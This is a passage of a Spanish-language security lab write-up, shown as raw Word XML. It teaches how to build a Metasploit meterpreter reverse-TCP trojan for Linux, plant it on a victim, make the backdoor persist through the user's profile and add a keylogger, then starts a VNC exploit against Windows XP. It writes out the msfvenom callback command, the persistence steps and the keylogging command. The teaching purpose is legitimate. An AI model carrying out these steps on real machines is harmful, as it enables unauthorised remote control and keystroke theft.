        <w:t xml:space="preserve">LINUX ELF BINARY GENERATOR, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">este script nos pide una direccion ip, esta dirección será la del servicio del hacker, también nos pide un numero de puerto que será el puerto del servicio del hacker, lo recomendable es utilizar un número de puerto común y utilizado por la víctima. Por ejemplo: el 8080 o 443… Como resultado obtendremos un fichero llamado “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” este ejecutable ya contiene la cargar con el exploit llamado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“reverse TCP”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Corrección:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o executive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En la nueva versión de el metasploit el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf payload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no existe, se debe substituir por la instrucción indicada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez tenemos el ejecutable se debe pasar a la maquina victima en el escritorio (recomendable que el ejecutable tenga la extension “.bin”)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La primera parte de la práctica ya estaría finalizada ahora falta montar el servicio de escucha de metasploit en la máquina del hacker (kali linux) a continuación de el documento vemos otro script dominado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">METASPLOIT LINUX METERPRETER LISTENER.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Este script lanzará un “listener” que será llamado por la víctima cuando este ejecute el programa “Executive” una vez conectado se inicia el exploit en este caso el “Reverse TCP” y con la carga “Meterpreter” será en este momento donde el hacker verá esta imagen:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4638675" cy="2690813"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9" name="image36.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image36.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4638675" cy="2690813"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si obtenemos el inductor del “meterpreter” tendremos la capacidad de inyectar comandos de la shell contra la víctima pero con algunas restricciones, como por ejemplo: no se permite la ejecución directa de programas pero se pueden lanzar comandos que realizan acciones y subir y bajar ficheros.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4686300" cy="3019425"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="24" name="image55.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image55.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686300" cy="301942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3F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como vemos en la imagen superior existen las instrucciones de el “meterpreter” Upload y Download.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Este es el momento de perpetuar el ataque del “backdoor” en la máquina de la víctima, lo realizaremos con los siguientes pasos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nos bajamos con Download el fichero de perfil de usuario para modificarlo en kali linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subimos el “Executive” otra vez a la raíz de la víctima en modo oculto (un punto delante del nombre).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Con un editor de texto editamos el perfil de usuario y añadimos una llamada al fichero oculto en la raíz de la víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subimos el fichero modificado a la víctima. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si se han realizado los pasos anteriores correctamente, cuando la víctima apague el ordenador y lo vuelva a encender y habrá una sesión de usuario éste llamará al fichero “profile” que hemos modificado y cargará el “backdoor” que se conectara al hacker sin problemas, por lo tanto hemos perpetuado el “backdoor” en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Segunda Parte de la práctica:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si en la primera parte hemos sido capaces de inyectar y perpetuar la segunda parte realiza una paso más. Consiste en inyectar también un “keyloger” que es capaz de leer y guardar todas las teclas que ha presionado la víctima a lo largo de su sesión:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como tenemos el “backdoor” activo somos capaces de descargar otra vez el fichero “profile”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Es el momento de modificar otra vez este fichero con los siguientes comandos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export DISPLAY=:0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo showkey &gt;&gt; /tmp/.xkey.log &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Concluimos esta práctica con los conocimientos básicos de el uso de los exploits con metasploit y también de el concepto de ejecutable con carga (troyano) y backdoor. También hemos visto que incluso el linux es vulnerable cuando interviene un sploit y un troyano con lo cual un administrador de red nunca debe ejecutar programas no confiables en una sesión de root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit con VMC contra windows Xp SP2/3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La práctica anterior estuvo relacionada con un exploit denominado reverse TCP, en esta práctica también lo usamos para inyectar un cliente VMC que le va a dar la capacidad al hacker de abrir un cliente de escritorio remoto contra el windows pudiendo tomar el control de el escritorio y sus servicios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Debido a que Windows XP fue un sistema operativo con muchos problemas de seguridad se intento parchear varias veces para evitar este tipo de ataques, Microsoft lanzó 5 “Service pack” para corregir estas vulnerabilidades esto en el fondo provocó el desarrollo inmediato de la siguiente versión de Windows, a que Windows XP fue un sistema operativo con muchos problemas fue uno de los más utilizados y actualmente aún se sigue utilizando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="2501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31" name="image62.png"/>
            <a:graphic>
